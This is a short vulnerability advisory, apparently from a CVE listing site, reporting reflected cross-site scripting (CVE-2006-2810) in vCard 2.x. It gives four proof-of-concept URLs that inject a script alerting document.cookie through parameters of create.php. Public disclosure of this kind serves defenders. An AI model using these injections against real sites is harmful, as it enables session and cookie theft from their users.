English Version
WLB2

CVE WLB2

 Topic: XSS in vCard
 Credit: Linux_Drox
 Date: 2006.03.12
 CWE: CWE-79 (Show similar)
 CVE: CVE-2006-2810 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Low
No
Yes

Hello
Vulnerable: vCard 2.x

http://www.belchiorfoundry.com

Exploit :
http://example.com/vcard/create.php?card_id='><script>alert(document.coo
kie)</script>

http://example.com/vcard/create.php?uploaded='><script>alert(document.co
okie)</script>

http://example.com/vcard/create.php?card_fontsize='><script>alert(docume
nt.cookie)</script>

http://example.com/vcard/create.php?card_color='><script>alert(document.
cookie)</script>

Discovery by Linux_Drox

http://www.lezr.com

Best Regards

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com